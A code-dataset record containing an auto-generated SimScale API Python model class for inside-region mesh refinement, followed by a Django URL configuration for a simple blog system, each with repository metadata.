| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,189
|
py
|
# coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class InsideRegionRefinementWithLength(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'length': 'DimensionalLength'
}
attribute_map = {
'type': 'type',
'length': 'length'
}
def __init__(self, type='INSIDE', length=None, local_vars_configuration=None): # noqa: E501
"""InsideRegionRefinementWithLength - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._length = None
self.discriminator = None
self.type = type
if length is not None:
self.length = length
@property
def type(self):
"""Gets the type of this InsideRegionRefinementWithLength. # noqa: E501
:return: The type of this InsideRegionRefinementWithLength. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this InsideRegionRefinementWithLength.
:param type: The type of this InsideRegionRefinementWithLength. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def length(self):
"""Gets the length of this InsideRegionRefinementWithLength. # noqa: E501
:return: The length of this InsideRegionRefinementWithLength. # noqa: E501
:rtype: DimensionalLength
"""
return self._length
@length.setter
def length(self, length):
"""Sets the length of this InsideRegionRefinementWithLength.
:param length: The length of this InsideRegionRefinementWithLength. # noqa: E501
:type: DimensionalLength
"""
self._length = length
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InsideRegionRefinementWithLength):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, InsideRegionRefinementWithLength):
return True
return self.to_dict() != other.to_dict()
|
[
"simscale"
] |
simscale
|
315a23ef405af371a30728983dc84b9cc0441de4
|
888a6485c8ace68b7129a11bc658746f1d23cceb
|
/search/urls.py
|
c316cf881dbc798233c8138d1d5f227538e10020
|
[] |
no_license
|
looksocii/Blog_System
|
cbb32104d7d6d31a24bb9864816c0d75b86e21f9
|
52598dc617104201c9ad387f0bff8ec41c8b32b0
|
refs/heads/master
| 2021-09-08T20:17:11.444456
| 2021-08-27T14:26:35
| 2021-08-27T14:26:35
| 246,037,346
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('register/', views.my_register, name='register'),
path('creator/', views.creator, name='creator'),
path('post/', views.post, name='post'),
path('changepass/', views.change_pass, name='change_pass'),
path('blog/<int:num>/', views.blog, name='blog'),
path('blog/<int:blog>/<int:com_remv>/', views.com_remove, name='com_remove'),
path('postremove/<int:post_id>/', views.post_remove, name='post_remove'),
path('editblog/<int:blogedit>/', views.edit_blog, name='edit_blog'),
path('editcom/<int:comedit>/', views.edit_com, name='edit_com'),
path('status/<int:change_status>/', views.status, name='status'),
]
|
[
"aopup1122@gmail.com"
] |
aopup1122@gmail.com
|